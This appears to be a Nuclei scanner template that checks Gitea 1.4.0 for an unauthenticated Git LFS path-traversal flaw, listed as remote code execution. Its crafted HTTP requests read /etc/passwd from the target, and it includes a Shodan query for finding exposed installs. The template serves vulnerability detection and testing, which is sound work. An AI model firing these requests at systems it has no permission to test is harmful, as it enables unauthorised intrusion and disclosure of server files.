id: gitea-rce info: name: Gitea 1.4.0 - Remote Code Execution author: theamanrawat severity: critical description: | Gitea 1.4.0 is vulnerable to remote code execution. reference: - https://www.exploit-db.com/exploits/44996 - https://github.com/kacperszurek/exploits/blob/master/Gitea/gitea_lfs_rce.py classification: cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: gitea product: gitea shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"' tags: gitea,rce,unauth,edb http: - raw: - | GET /api/v1/repos/search?limit=1 HTTP/1.1 Host: {{Hostname}} - | POST /{{repo}}.git/info/lfs/objects HTTP/1.1 Host: {{Hostname}} Content-Type: application/json Accept: application/vnd.git-lfs+json { "Oid": "....../../../etc/passwd", "Size": 1000000, "User" : "{{randstr}}", "Password" : "{{randstr}}", "Repo" : "{{randstr}}", "Authorization" : "{{randstr}}" } - | GET /{{repo}}.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: regex part: body_3 regex: - "root:.*:0:0:" - type: word part: header_3 words: - "application/octet-stream" extractors: - type: regex name: repo group: 1 regex: - '"name":".*","full_name":"(.*)","description"' internal: true # digest: 4a0a00473045022100e6535e2beccabe9f5e98a70a727d618153f63928b80da833407c6f6a93a3ceef022011ab10769dbed5f1af3b12849f603e2fd7650f2d3bf545bfbf6668bf4d88b835:922c64590222798bb761d5b6d8e72950